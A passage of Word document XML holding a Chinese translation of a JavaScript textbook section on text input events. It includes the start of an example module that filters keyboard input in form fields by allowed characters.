        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是在</w:t>
      </w:r>
      <w:r>
        <w:t>ondragenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ondragleave</w:t>
      </w:r>
      <w:r>
        <w:t>使用的工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的子元素则返回</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>ue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function ischild(a,b){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(;a;a=a.parentNode)if(a===b)return true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;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46" w:name="17_8_Wen_Ben_Shi_Jian_"/>
      <w:r>
        <w:t>17.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文本事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个传统的键盘输入事件。</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件是低级事件，下一节会介绍。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件是较高级的事件，它表示产生了一个可打印字符。</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案定义一个更通用的</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件，不管来源（例如：键盘、粘贴或拖放形式的数据传输、亚洲语言输入法、声音或手写识别系统），无论何时用户输入文本时都会触发它。在写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件尚未得到支持，但</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器支持一个非常类似的</w:t>
      </w:r>
      <w:r>
        <w:t>"textInput"</w:t>
      </w:r>
      <w:r>
        <w:t>（使用大写字母</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>）事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>建议中的</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件和已</w:t>
      </w:r>
      <w:r>
        <w:t>经实现的</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>事件都传递一个简单的事件对象，它有一个用于保存输入文本的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性。（另一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>inputMethod</w:t>
      </w:r>
      <w:r>
        <w:t>是建议用于指定输入源，但它尚未实现。）对于键盘输入，</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性通常只保存单个字符，但其他输入源通常可能包含多个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件传递的对象更加混乱。一个</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件表示输入的单个字符。事件对象以数字</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码的形式指定字符，所以必须用</w:t>
      </w:r>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
      <w:r>
        <w:t>把它转换成字符串。在大多数浏览器中，事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了输入</w:t>
      </w:r>
      <w:r>
        <w:t>字符的编码。但是由于历史的原因，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>charCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性。大多数浏览器只在当产生可打印字符时触发</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。但是</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>在产生</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>非打印字符时也触发</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。为了检测这种情况（这样就能忽略非打印字符），可以查找有</w:t>
      </w:r>
      <w:r>
        <w:t>charCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性但值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的事件对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过取消</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件来阻止字符输入，这意味着可以使用这些事件来过滤输入。例如，你可能想阻止用户在只接受数字数据的域中输入字母。例</w:t>
      </w:r>
      <w:r>
        <w:t>17-6</w:t>
      </w:r>
      <w:r>
        <w:t>是一段不唐突的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt</w:t>
      </w:r>
      <w:r>
        <w:t>代码模块，它恰好实现了这种过滤。它查找有额外属性（非标准）</w:t>
      </w:r>
      <w:r>
        <w:t>data-allowed-chars</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type=text</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。这个模块在这类文本输入域上注册了</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序来限制用户只能输入出现在许可属性值中的字符。例</w:t>
      </w:r>
      <w:r>
        <w:t>17-6</w:t>
      </w:r>
      <w:r>
        <w:t>顶部注释的开头部分包含使用这个模块的一些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-6</w:t>
      </w:r>
      <w:r>
        <w:t>：过滤用户输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*InputFilter.js</w:t>
      </w:r>
      <w:r>
        <w:t>：不唐突地过滤＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的键盘输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块查找文档中拥有</w:t>
      </w:r>
      <w:r>
        <w:t>"data-allowed-chars"</w:t>
      </w:r>
      <w:r>
        <w:t>属性的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="text"</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它为所有这类元素都注册</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>来限制用户只能输入出现在许可属性值中的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素也有一个</w:t>
      </w:r>
      <w:r>
        <w:t>"data-messageid"</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>那么认为这个值是另一个文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果用户输入了不允许的字符，那么会显示消息元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果用户输入了允许的字符，那么会隐藏消息元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个信息</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>元素用于向用户说明拒绝输入的</w:t>
      </w:r>
      <w:r>
        <w:t>原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它通常应该由</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>控制样式，所以它开始不可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>下面是使用这个模块的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>邮政编码：＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="zip"type="text"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*data-allowed-chars="0123456789"data-messageid="zipwarn"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span id="zipwarn"style="color:red;visibility:hidden"</w:t>
      </w:r>
      <w:r>
        <w:t>＞只支持数字＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块相当地不唐突，它没有定义全局命名空间中的任何符号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whenReady(fun</w:t>
      </w:r>
      <w:r>
        <w:t>ction(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当文档加载完毕时，运行这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var inputelts=document.getElementsByTagName("input");//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>inputelts.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=inputelts[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过不是文本域或没有</w:t>
      </w:r>
      <w:r>
        <w:t>data-allowed-chars</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(elt.type!="text"||!elt.getAttribute("data-allowed-chars")</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素上注册事件处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>传统的</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序能够在任何地方运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//textInput</w:t>
      </w:r>
      <w:r>
        <w:t>（混合大小写）在</w:t>
      </w:r>
      <w:r>
        <w:t>2010</w:t>
      </w:r>
      <w:r>
        <w:t>年后</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//textinput</w:t>
      </w:r>
      <w:r>
        <w:t>（小写）是</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案中的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(elt.addEventListener){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.addEventListener("keypress",filter,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.addEventListener("textInput",filter,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.addEventListener("textinput",filter,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>也不会支持</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.attachEvent("onkeypress",filter);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是用于过滤用户输入的</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function filter(event){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取事件对象和目标元素对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>e=event||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>标准或</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var target=e.target||e.srcElement;//</w:t>
      </w:r>
      <w:r>
        <w:t>标准或</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=null;//</w:t>
      </w:r>
      <w:r>
        <w:t>输入的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取输入的字符或文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.type==="textinput"||e.type==="textInput")text=e.data;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>这是传统的</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于可打印键的</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>charCode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var code=e.charCode||e.ke</w:t>
      </w:r>
      <w:r>
        <w:t>yCode;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果按下的是任何形式的功能键，不要过滤它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(code</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>32||//ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>控制字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.charCode==0||//</w:t>
      </w:r>
      <w:r>
        <w:t>功能键（仅指</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.ctrlKey||e.altKey)//</w:t>
      </w:r>
      <w:r>
        <w:t>按下辅助键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return;//</w:t>
      </w:r>
      <w:r>
        <w:t>不过滤这个事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>把字符编码转化为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=String.fromCharCode(code);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在需要从</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素中寻找所需信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
